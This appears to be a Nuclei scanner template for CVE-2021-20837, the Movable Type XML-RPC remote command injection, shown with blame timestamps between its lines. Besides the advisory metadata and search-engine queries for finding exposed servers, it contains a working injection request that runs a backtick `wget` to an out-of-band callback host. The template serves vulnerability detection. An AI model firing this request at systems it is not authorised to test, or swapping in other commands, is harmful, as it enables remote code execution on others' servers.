2021-10-29 12:43:32 +00:00
id : CVE-2021-20837
info :
2022-05-09 16:12:52 +00:00
name : MovableType - Remote Command Injection
2021-10-29 16:46:25 +00:00
author : dhiyaneshDK,hackergautam
2021-10-29 12:45:07 +00:00
severity : critical
2022-05-09 16:12:52 +00:00
description : MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability in MovableType.
2021-10-29 12:43:32 +00:00
reference :
2021-10-29 16:03:59 +00:00
- https://nemesis.sh/posts/movable-type-0day/
2021-10-29 12:43:32 +00:00
- https://github.com/ghost-nemesis/cve-2021-20837-poc
2021-10-29 16:03:59 +00:00
- https://twitter.com/cyber_advising/status/1454051725904580608
- https://nvd.nist.gov/vuln/detail/CVE-2021-20837
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/164818/Movable-Type-7-r.5002-XMLRPC-API-Remote-Command-Injection.html
2021-10-29 12:45:07 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-10-29 12:45:07 +00:00
cve-id : CVE-2021-20837
cwe-id : CWE-78
2024-01-29 17:11:14 +00:00
epss-score : 0.96998
2024-05-31 19:23:20 +00:00
epss-percentile : 0.99738
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : sixapart
product : movable_type
2024-06-07 10:04:29 +00:00
shodan-query :
- http.title:"サインイン | movable type pro"
- cpe:"cpe:2.3:a:sixapart:movable_type"
2024-05-31 19:23:20 +00:00
fofa-query : title="サインイン | movable type pro"
google-query : intitle:"サインイン | movable type pro"
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,packetstorm,rce,movable,sixapart
2021-10-29 12:43:32 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-10-29 12:43:32 +00:00
- raw :
- |
2021-10-29 16:03:59 +00:00
POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1
2021-10-29 12:43:32 +00:00
Host : {{Hostname}}
Content-Type : text/xml
2021-10-29 16:03:59 +00:00
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>mt.handler_to_coderef</methodName>
<params>
<param>
<value>
<base64>
{{base64("`wget http://{{interactsh-url}}`")}}
</base64>
</value>
</param>
</params>
</methodCall>
matchers-condition : and
2021-10-29 12:43:32 +00:00
matchers :
2021-10-29 16:03:59 +00:00
- type : word
part : interactsh_protocol
words :
- "http"
- type : word
words :
- "failed loading package"
2021-10-29 12:43:32 +00:00
2021-10-29 16:03:59 +00:00
- type : status
status :
2022-05-09 16:12:52 +00:00
- 200
2024-06-08 16:02:17 +00:00
# digest: 490a0046304402201c9d2d169bc3235a6c300a6c09acd4cc45d629766c0cdadd28ee0d915b9ca01102201d344e6c15f8ff7f83444e9818fd60a0463a5f87fe7ef5172451aac3d8adef12:922c64590222798bb761d5b6d8e72950